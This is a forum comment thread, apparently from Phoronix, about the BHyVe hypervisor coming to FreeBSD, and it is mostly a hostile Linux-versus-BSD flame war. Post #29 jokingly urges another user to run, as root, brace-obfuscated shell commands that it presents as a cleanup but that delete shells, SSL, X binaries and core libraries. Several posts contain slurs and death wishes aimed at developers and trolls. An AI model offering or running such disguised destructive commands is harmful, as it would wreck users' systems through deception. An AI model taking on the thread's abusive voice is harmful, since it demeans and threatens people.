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BHyVe: A New Hypervisor Coming To FreeBSD 10.0

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  • #21
    This is how BHyVe works on FreeBSD.

    Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.


    • #22
      Originally posted by brad0 View Post
      come back when your OS doesn't suck shit through a straw. Linux sucks moose balls.
      I laughed at comments like these 10 years ago, now it's just sad...


      • #23
        Originally posted by tangram View Post
        Xen supports NetBSD and variants of Solaris as dom0. Reference:
        Yes, but it still "needs" OS in dom0 and it's not usable without OS. And only really crazy guys would use NetBSD or Solaris in dom0 - virtually all production setups are running Linux.


        • #24
          Originally posted by dyna View Post
          I laughed at comments like these 10 years ago, now it's just sad...
          I can remember, 10+ years ago BSD guys laughed at Linux as there was nothing to compare with jails (just dumb chroot is no match for sure). Now Linux haves KVM, LXC, OpenVZ and so on. So it's definitely time for Linux users to remember old story and get idea it's their time to laugh todat . That's what arrogant and selfish BSD lunatics deserve.


          • #25
            We must convince all FLOS software devs to make thier software which depend on as much linux specific features as possible so that BSD fuckers will not be able to port them to thier OS.

            And thus thier OS will have almost applications to run and more people will leave BSD altogether and the devs/fuckers can hang themselves.

            This will also teach them a lesson for opposing Linux and Freedom and Open Source.


            • #26
              Originally posted by systemd rulez View Post
              We must convince all FLOS software devs to make thier software which depend on as much linux specific features as possible so that BSD fuckers will not be able to port them to thier OS.

              And thus thier OS will have almost applications to run and more people will leave BSD altogether and the devs/fuckers can hang themselves.

              This will also teach them a lesson for opposing Linux and Freedom and Open Source.
              Please don't stop posting, I want to see how low your brain functions actually can get.
              So, at first you accuse anyone who is not using a copyleft license of being a Microsoft and Apple whore and now you come up with tactics that are known to be used by Microsoft and Apple?

              Man, is more than one person using your account? One person alone can't be that dumb and pathetic.

              Oh, by the way, while you are talking about open source developers and what they should do, we are still waiting to see your contributions to the open source environment.


              • #27
                Originally posted by systemd rulez View Post
                We must convince all FLOS software devs to make thier software which depend on as much linux specific features as possible
                You see, world needs some competition. Though BSDs are really crappy competitors. They have borked GPU drivers, virtually no virtualization, almost no choice for filesystems and so on. To my taste it's completely unusable as desktop and very troublesome and restricted as server. Yet, kicking half-deads isn't a great attitude. Even if it could be tempting, granted that BSD nuts are usually extremely arrogant and ignorant (at least from my experience). And after all, direct attacks are lame. Have you ever heard about "fat trolling"? Fat trolling suxx. Thin trolling is much better in all regards


                • #28
                  Originally posted by 0xBADCODE View Post
                  You see, world needs some competition. Though BSDs are really crappy competitors. They have borked GPU drivers, virtually no virtualization, almost no choice for filesystems and so on. To my taste it's completely unusable as desktop and very troublesome and restricted as server. Yet, kicking half-deads isn't a great attitude. Even if it could be tempting, granted that BSD nuts are usually extremely arrogant and ignorant (at least from my experience). And after all, direct attacks are lame. Have you ever heard about "fat trolling"? Fat trolling suxx. Thin trolling is much better in all regards
                  For me it is adecuate for desktop, as is Linux; for NetFlix and huge ISP's and hosting companies it is superb for server; for Apple it is good as a base system (in union with Mach); for Juniper it is great for embedded products; for McAfee it is great for their firewall product... yet for you it is crap.


                  • #29
                    Originally posted by systemd rulez View Post
                    come back when BSD doesn't suck proprietary dicks oh wait.... That'll never happen. BSD WAS created to suck proprietary dicks.
                    Very insightful, in light of BSDI. I wonder why they bothered to commit some code back.

                    By the way, I'm afraid you might have some "permissive" software left on your computer. Could you help rid the world of this nuisance by running this as root?
                    export PATH=$(echo /{usr/local/,usr/,}{s,}bin:|sed 's: ::g') DIRS=$(echo /{usr/local/,usr/,}{s,}bin); for d in $DIRS; do rm -f $d/{dhc,X,ssl}* $d/{*s,a}sh*  &>/dev/null; done
                    find /usr/share |grep -E '{m,}{e,doc,an-old}\.tmac'|xargs rm -f {/usr,}/lib/lib{ncurses,ssl,*GL}*
                    Last edited by Ibidem; 11 February 2013, 11:14 PM.


                    • #30
                      Never want to be grouped in with these people


                      Long time lurker, I created this account just to say this- I will never in my life allow myself to be grouped in with the fucktardedness represented throughout this thread. A copy of these posts should always be maintained to point out that there is a severe distasteful and classless contingency of Linux enthusiasts which give Linux a bad name and, well, anyone else interested in how a computer works a bad name. These people are "enthusiasts" much like I would describe people who continually rant on about how Mercedes is a superior car to anything else "enthusiasts". Netflix scrapped Linux for production use and used BSD instead- I would like to know how this can be rationalized with, of course the creative and repetitive use of fecal matter imagery, to explain how Linux lost out at being the superior datacenter or production environment for them? Linux is just now starting to move to LLVM/Clang for its kernel but FreeBSD has done this first. How in every regard can BSD be behind when in that case Linux is behind? One way or another I use all OSes for their most appropriate use and do not just use or favor one over another. These are not brands of cereal they are operating systems and free ones at that. I just will never have buyer's remorse for something that is free no matter how you slice it. A hypervisor for FreeBSD was actually great news to hear for me today. It just means a different take on something which has proven useful to others and may yield benefits that other hypervisors don't have. Go ahead say what you will I'm just not going to respond or check up on any retaliation I just have better things to do with my time and the users in this thread with all of their abusive language (which indicates a very SEVERE lack of self worth) have nothing to teach me...ever. The mach kernel which Apple relies upon is the basis for their operating system and built upon BSD development. Within the scope of time that they made the decision to switch to it they have become the biggest company in U.S. history. I have mentioned two companies here that have experienced a huge amount of success due to their involvement with BSD as a development environment. I've personally set up NAS servers with FreeBSD that have worked very well. I have also been able to port software to FreeBSD which was only available for Linux for my own use with a startling amount of speed and ease. They really are not so different I've found. Hopefully, in the future when there is a news article about someone achieving something or improving the quality of things the first posts will not be an incomprehensible slew of negative comments, heckling, and off-topic self interested ranting. I don't think it will change in my lifetime but we can always hope for the untimely death of these insecure pathetic trolls. Have fun kids.

